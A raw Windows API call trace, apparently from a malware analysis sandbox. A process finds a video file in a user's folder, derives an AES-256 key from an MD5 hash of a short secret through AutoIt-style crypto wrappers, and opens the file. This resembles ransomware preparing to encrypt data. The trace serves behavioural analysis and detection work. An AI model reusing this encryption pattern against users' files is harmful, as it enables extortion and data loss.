[0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.728] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.728] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.728] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.728] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.728] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x9c8857a0, ftLastWriteTime.dwHighDateTime=0x1d5dfea, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 0x90ae18 [0194.728] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.729] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0194.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.729] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0194.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.729] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.729] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.730] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0194.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.730] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.730] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0194.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.730] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0194.731] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.731] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.731] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.731] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.731] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0194.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.732] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.732] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.732] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.732] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0194.733] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0194.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.733] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.735] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0194.735] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0194.735] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.735] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0194.735] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.735] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0194.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.736] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.736] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0194.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.736] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.736] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.736] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0194.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.736] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.736] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0194.737] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0194.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0194.759] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0194.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.759] CryptDestroyHash (hHash=0x90af58) returned 1 [0194.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0194.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0194.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\6rbgdlsa.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.761] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.761] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x8a0000, 